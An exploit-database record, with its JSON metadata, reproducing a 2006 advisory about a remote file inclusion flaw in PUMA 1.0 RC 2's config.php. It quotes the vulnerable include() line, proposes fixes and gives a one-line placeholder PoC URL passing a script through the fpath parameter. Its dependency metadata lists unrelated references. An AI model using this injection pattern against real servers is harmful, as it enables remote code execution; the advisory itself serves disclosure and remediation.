ID 1337DAY-ID-810
Type zdt
Reporter Philipp Niedziela
Modified 2006-09-10T00:00:00
Description
Exploit for unknown platform in category web applications
===============================================================
PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability
===============================================================
+--------------------------------------------------------------------
+
+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: PUMA 1.0 RC 2
+ Vendor ............: http://php.psywerx.net/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+
+--------------------------------------------------------------------
+
+ Affected File:
+ /config.php
+
+ Code:
+ .....
+ // Select language
+ $lang = "lang_english.php";
+ include($fpath."./language/$lang");
+ .....
+
+--------------------------------------------------------------------
+
+ $fpath is used in the include() call above without being initialized or validated first, so its value can be supplied by the requester (see PoC below)
+
+--------------------------------------------------------------------
+
+ Solution:
+ -> Declare (initialize) $fpath before it is used, so it cannot be supplied externally
+ -> Deny direct access to config.php
+ -> or modify the code as follows (note: this check only rejects requests that pass an fpath parameter; initializing $fpath addresses the root cause):
+
+ if(!isset($_REQUEST['fpath']) && !isset($_GET['fpath']) && !isset($_POST['fpath'])){
+ // original config.php code goes here
+ }
+ else {
+ echo "You cannot access this file directly.";
+ die();
+ }
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/config.php?fpath=[script]
+
+
+-------------------------[ E O F ]----------------------------------
# 0day.today [2018-01-02] #
{"id": "1337DAY-ID-810", "lastseen": "2018-01-02T09:16:10", "viewCount": 6, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2018-01-02T09:16:10", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB4535288", "KB4532095", "KB4532098"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220171082", "OPENVAS:1361412562311220171081"]}, {"type": "zdt", "idList": ["1337DAY-ID-30759", "1337DAY-ID-31953", "1337DAY-ID-33402"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:02CDEF66A799736EF15E27F1771DA9EA"]}, {"type": "exploitdb", "idList": ["EDB-ID:47536"]}, {"type": "cve", "idList": ["CVE-2015-9222", "CVE-2017-12120", "CVE-2019-10969", "CVE-2019-10963"]}, {"type": "ics", "idList": ["ICSA-19-274-03"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SSH/LIBSSH_AUTH_BYPASS"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2017-0245.NASL"]}, {"type": "seebug", "idList": ["SSV:97231"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A234F8456A3CCBBC3F469D5F49D64E29"]}, {"type": "talos", "idList": ["TALOS-2017-0472"]}], "modified": "2018-01-02T09:16:10", "rev": 2}, "vulnersScore": 5.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/810", "description": "Exploit for unknown platform in category web applications", "title": "PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability", "cvelist": [], "sourceData": "===============================================================\r\nPUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\n+--------------------------------------------------------------------\r\n+\r\n+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected Software .: PUMA 1.0 RC 2\r\n+ Venedor ...........: http://php.psywerx.net/\r\n+ 
Class .............: Remote File Inclusion\r\n+ Risk ..............: high (Remote File Execution)\r\n+ Found by ..........: Philipp Niedziela\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected File:\r\n+ /config.php\r\n+\r\n+ Code:\r\n+ .....\r\n+ // Select language\r\n+ $lang = \"lang_english.php\";\r\n+ include($fpath.\"./language/$lang\");\r\n+ .....\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ $fpath is not properly sanitized before being used\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Solution:\r\n+ -> Declare $fpath!\r\n+ -> Deny direct access to config.php\r\n+ -> or modify code:\r\n+\r\n+ if(!isset($_REQUEST['fpath']) && !isset($_GET['fpath']) &&\r\n!isset($_POST['fpath'])){\r\n+ //code of org. config.php\r\n+ }\r\n+ else {\r\n+ echo \"You cannot access this file directly.\";\r\n+ die();\r\n+ }\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ PoC:\r\n+\r\n+ http://[target]/config.php?fpath=[script]\r\n+\r\n+\r\n+-------------------------[ E O F ]----------------------------------\r\n\r\n\r\n\n# 0day.today [2018-01-02] #", "published": "2006-09-10T00:00:00", "references": [], "reporter": "Philipp Niedziela", "modified": "2006-09-10T00:00:00", "href": "https://0day.today/exploit/description/810"}
{}